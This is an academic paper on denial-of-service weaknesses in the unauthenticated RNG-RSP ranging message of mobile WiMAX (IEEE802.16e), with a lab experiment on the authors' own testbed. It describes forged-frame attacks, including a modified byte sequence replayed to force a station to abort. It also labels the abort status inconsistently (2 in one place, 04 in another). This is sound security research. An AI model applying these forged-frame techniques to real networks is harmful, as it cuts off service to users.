Simulating Denial of Service Attack Using WiMAX ...

International Journal of Network and Mobile Technologies ISSN 2229-9114 Electronic Version VOL 2 / ISSUE 1 / JANUARY 2011

This paper is available online at http://ijnmt.intimal.edu.my/

Simulating Denial of Service Attack Using WiMAX Experimental Setup John Kok Han Hong1, Mohamad Yusoff Alias2 and Bok Min Goi3 1

Multimedia University, Cyberjaya, Malaysia, Faculty of Engineering, [email protected] Multimedia University, Cyberjaya, Malaysia, Faculty of Engineering, [email protected] 3 Tunku Abdul Rahman University, Malaysia, Faculty of Engineering & Science, [email protected] 2

Abstract The IEEE802.16 Wireless Metropolitan Area Network (WMAN) is set to revolutionize the delivery of Broadband Wireless Access (BWA) not unlike how the IEEE802.11 WiFi standard popularized wireless access to the masses. Designed to operate over distances as large as 50km at speeds of up to 74Mbps, it will serve many users in both fixed and mobile environments. In order to manage the system, the standard describes a set of Medium Access Controls (MAC) and air interfaces that cover a broad range of applications. This paper presents a study on IEEE802.16’s MAC operation, particularly the Ranging Response (RNG-RSP) message and its vulnerabilities to DoS attacks. We have tested several aspects of how the RNG-RSP message can be exploited on a live IEEE802.16e network to ascertain the impact of such DoS attacks on WiMAX systems.

Key words: WiMax, Denial of Service, WMAN, MACm Ranging Response Message

30 5

Simulating Denial of Service Attack Using WiMAX Experimental Setup

John Kok Han Hong Mohamad Yusoff Alias Bok Min Goi

International Journal of Network and Mobile Technologies ISSN 2229-9114 Electronic Version VOL 2 / ISSUE 1 / JANUARY 2011

1

This paper is available online at http://ijnmt.intimal.edu.my/

Introduction

Worldwide Interoperability for Microwave Access (WiMAX) is a wireless broadband solution that provides a myriad of features in terms of deployment options and service potential. The Orthogonal Frequency Division Multiplexing (OFDM)-based physical layer of WiMAX is resistant to multipath loss and has very high peak data rates going as high as 74Mbps over a distance of 50km serving a large number of users. WiMAX is also an Internet Protocol (IP)based network that has full support for mobility with built-in power saving mechanisms [2]. IEEE802.16e-2005 Mobile WiMAX was designed to increase the scope of WiMAX to provide support for mobility and introduced many changes to the PHY and MAC layer protocols because of the mobility support which needed to address various issues that were not present in the IEEE802.16-2004 Fixed WiMAX such as power management, handoff and enhanced security [4], [5]. The MAC layer in IEEE802.16e-2005 specification is considerably different from the IEEE802.16-2004 in which mobility is not supported. There is an addition of QoS, handoff and power management support. The security features of the IEEE802.16 standard lies in the privacy sub-layer which provides the Subscriber Station (SS) with security capabilities and protects the Base Station (BS) from malicious attacks that may disrupt its services. However, many more vulnerabilities still remain and cause the standard to be susceptible to attacks on its integrity and availability [1].

2

IEEE802.16e MAC LAYER

The MAC Layer allows for dynamically variable modulation and a forward error correction (FEC) code that enables the BS and SS to optimize their transmission burst profile on a frame-to-frame basis, trading off bandwidth with robustness. The BS initially transmits with the most robust modulation and FEC scheme available to ensure that all SS are able to receive the uplink (UL-) and downlink (DL-) maps. The BS adjusts to progressively higher capacity bursts based on the schedule described on the DL-MAP. Similarly, each SS will transmit its uplink using the exact time and burst profile scheduled by the BS. If required, SS are able to ask for longer uplink windows which allow them to pass more traffic. Exchanging Dynamic Service Change Requests and Grants, the BS and SS are able to negotiate bandwidth allocations according to their respective needs and capabilities. There are different mechanisms which is used to tailor the service level received by an SS, e.g. unsolicited bandwidth grants and polled opportunities [3].

3

Initial Network Entry

Figure 1: Network Entry – Ranging

31 5

Simulating Denial of Service Attack Using WiMAX Experimental Setup

John Kok Han Hong Mohamad Yusoff Alias Bok Min Goi

International Journal of Network and Mobile Technologies ISSN 2229-9114 Electronic Version VOL 2 / ISSUE 1 / JANUARY 2011

This paper is available online at http://ijnmt.intimal.edu.my/

During initial network entry, the SS announces its presence to the BS in a detected active channel via a Range Request (RNG-REQ) message. The BS in turn, uses the Range Response (RNG-RSP) message to adjust SS transmission frequency, time and power. The RNG-RSP is periodically sent to the SS to fine-tune transmission parameters regardless of whether an RNG-REQ message is sent by the SS. This message is of interest as broadcasted management frames are largely dependent on the timing and state machines of the MAC [6]. Upon ranging, the next step of the network entry process is getting the SS authorized to enter the network. As data integrity and security is a large concern for major deployments, the IEEE802.16 standard has made provisions for strong authentication for the SS and is handled by the Security Sublayer of the MAC.

4

Anatomy of RNG-RSP Message

The RNG-RSP message sent by the BS to fine-tune transmission parameters periodically is formatted as in Table 1.

Management message type

Table 1: RNG-RSP Message Format [4] Uplink Channel ID (8-bits) Message Content

5 = RNG-RSP

ID of uplink channel on which BS received RNG-REQ

Shown in Table 2.

Table 2: RNG-RSP Message Encodings [4] Power Level Adjust

Tx Power adjustment. Specifies the change in SS transmission power level

Downlink Frequency Override

Center frequency, in kHz, of new downlink channel. SS to redo initial ranging

Downlink Op. Burst Profile

Parameter sent in response to RNG-REQ. Contains DIUC information for BS transmissions to SS

Ranging Status

Used to indicate if uplink messages are within limits of BS 1=continue, 2=abort, 3=success, 4=rerange

Table 2 shows a truncated list of RNG-RSP message encodings that are of interest and potentially exploitable in Denial of Service (DoS) attacks. The RNG-RSP message, as seen in the table above, can do much more than finetuning transmission parameters. It can be used to order SS to change uplink or downlink channels, transmission power levels or even to abort all transmissions and reinitialize its MAC [3].

5

Exploiting RNG-RSP

The RNG-RSP message is vulnerable to potentially very serious exploitations as it is unencrypted, unauthenticated and stateless. Hence, a validly formatted RNG-RSP message addressed to the SS will almost certainly be accepted and acted upon regardless of when it is sent. There are several ways the RNG-RSP message can be exploited to cause a DoS attack. The simplest method is to forge and replay unsolicited RNG-RSP messages with the Ranging Status field set to the value 2, telling the SS to abort communications and reinitialize its MAC. Attackers need to determine the victim’s Connection Identification (CID) a priori in order to address the message specifically. This attack is fairly advantageous to the attacker because it does not require knowledge apart from the CID which can be derived from broadcasted messages or even from brute force guessing. Among the other ways forged RNG-RSP messages can be maliciously used to disrupt the network can be obtained from the truncated list of message encodings. Transmission power of the SS can be adjusted to be either too low to the point where the SS cannot reach the BS and has to waste resources to recursively correct itself or too high to severely drain the battery power of mobile devices in an attack known as the “water torture attack” [7]. The SS’s upor downlink channels may be overridden by the RNG-RSP and be instructed to shift to some other channels of the attacker’s choice. In this case, if the attacker does not have a BS operating on that shifted channel, the SS will scan and discard unused channels and eventually find its way back to the proper channel. Depending on the number of channels available for use, this process will take some time as SS has to spend a minimum of 2ms listening to each channel before moving on. It must be noted that prior research on Denial of Service attacks in [3] and [7] are purely academic and conjectural, based on detailed study and approximation on the IEEE802.16 standard. The aim of this research is to provide a simulation and real-world experimentation to shed light on these reported vulnerabilities.

32 5

Simulating Denial of Service Attack Using WiMAX Experimental Setup

John Kok Han Hong Mohamad Yusoff Alias Bok Min Goi

International Journal of Network and Mobile Technologies ISSN 2229-9114 Electronic Version VOL 2 / ISSUE 1 / JANUARY 2011

6

This paper is available online at http://ijnmt.intimal.edu.my/

Experiment

In this section, the aim is to set up a simple WiMAX network consisting of a BS and MS and study the effects of simulated components of a malicious modified RNG-RSP attack, namely the adjustment of power levels, overriding the downlink frequency and ranging status.

6.1 Experimental Setup and Metrics The experiment to assess the effects of a RNG-RSP DoS attack was carried out on a live WiMAX network consisting of a Motorola WAP400 IEEE802.16e BS and a Dell laptop computer equipped with a Beceem IEEE802.16e PCMCIA card serving as the SS. Readings are taken from the SS using Beceem’s diagnostic tools. Table 3 shows the configuration used in the experiment.

Figure 2: IEEE802.16e testbed Table 3: Experimental Configurations Standard IEEE802.16e-2005 Center frequency 2.643 GHz Average Received Signal at SS at 10m -50dBm SS MAC Address 00:12:CF:41:E5:0E

6.2 Experimental Evaluation and Results At present, the fabrication and packet injection of IEEE802.16e management frames is not yet ready but codes to modify the behavior and characteristic of members of the network can be sent and acted upon to replicate an unsolicited but compromised management frame. In the first experiment, we sought to determine the effects of tampering with the SS power level as possible with the RNG-RSP message. SS was located 10m away from BS and transmission power levels were monitored for 120s. Instructions to reduce power to -40dBm (lowest setting) were injected in 41s and 71s.

Figure 3: Experiment 1 - SS Transmission Power The purpose of the second experiment was to capture the RNG-RSP message that was sent by the BS to the SS during the initial ranging period. As mentioned earlier, the format of the management frame is unencrypted and therefore is read as below: 33 5

Simulating Denial of Service Attack Using WiMAX Experimental Setup

John Kok Han Hong Mohamad Yusoff Alias Bok Min Goi

International Journal of Network and Mobile Technologies ISSN 2229-9114 Electronic Version VOL 2 / ISSUE 1 / JANUARY 2011

7

This paper is available online at http://ijnmt.intimal.edu.my/

Discussion

This experiment is only an approximation of the academic analysis of the effects when a compromised RNG-RSP message is received by the SS. Messages to modify the parameters of the SS were directly inputted during regular operation to simulate unsolicited RNG-RSP messages. Ideally, the experiment should be performed with 3 members in the network; BS, victim SS and malicious SS. The malicious SS would pose as the attacker with the capabilities to sniff and derive information such as UL-MAP schedules and BS and SS CID, fabricate modified management messages and inject them into victim SS. In the first experiment, the transmission power of the SS hovers around -18dBm under normal operations. When injected with the instruction to power down to -40dBm (minimum), the SS immediately complies and upon disconnection, attempts to increase its transmit power to reestablish communications. Each reconnection takes approximately 10s. Time in which there is no service. In the second experiment, the payload content can be interpreted directly using [4] documentation. The first 4 bytes are of utmost importance; 05 represent management message type 5, RNG-RSP, followed by 00 which is the CID, 04 represents the ranging status and 01 indicates continue ranging. Because the message is unencrypted and unauthenticated, it is possible to capture this message and modify the string to 05 00 04 04, in which 04 represents abort, and replay this message. The victim SS cannot verify this message and will accept it as instruction from the BS to abort. In light of the results obtained from these experiments, the reaction to unsolicited management frames such as the RNG-RSP message is largely dependent on the manufacturers design on the network equipment and may vary. It is very clear, however, that a simple DoS attack from tampered management frames can be very devastating to network efficiency.

8

Conclusion

Unlike previous technology such as IEEE802.11, there is still time to improve the security standard of the IEEE802.16 standard before it becomes as ubiquitous as how WiFi has become today. This paper presents a study on IEEE802.16’s MAC operation, particularly the RNG-RSP message and its vulnerabilities to DoS attacks. We have tested several aspects of how the RNG-RSP message can be exploited on a live IEEE802.16e network to ascertain the impact of such DoS attacks on WiMAX systems.

Acknowledgements This project is funded by Ministry of Science, Technology and Innovation (MOSTI) of Malaysia under the eSciendFund programme.

References [1] S. Ahsan, WiMAX Standards and Security, CRC Press, 2008. [2] J. G. Andrews, A. Ghosh, and R. Muhamed, Fundamentals of WiMAX, Understanding Broadband Wireless Networking, Pretince Hall, 2007. [3] D. Boom, and R. Buddenberg, Denial of Service vulnerabilities in IEEE802.16 Wireless Networks, IEEE C802.16e-04/406, 2004. [4] IEEE, Part 16: Air interface for fixed broadband wireless access systems, Standard 802.16-2004, October, 2004. [5] IEEE, Part 16: Air interface for fixed and mobile broadband wireless access systems. Amendment 2: Physical and Medium Access Control Layers for Combined Fixed and mobile Operation in Licensed Bands and Corrigendum 1, Standard 802.16e-2005 and IEEE Standard 802.16-2004/Cor 1-2005, October, 2005. [6] A. Makelainen, Analysis of Handoff Performance in Mobile WiMAX Networks, Helsinki, University of Technology, December, 2007. [7] S. Naseer, M. Younus, and A. Ahmed, Vulnerabilities exposing IEEE802.16e networks to DoS attacks: A survey, 9th ACIS International Conference on Software Engineering, Artificial Intelligence, Networking and Parallel/Distributed Computing, 2008. 34 5

Simulating Denial of Service Attack Using WiMAX Experimental Setup

John Kok Han Hong Mohamad Yusoff Alias Bok Min Goi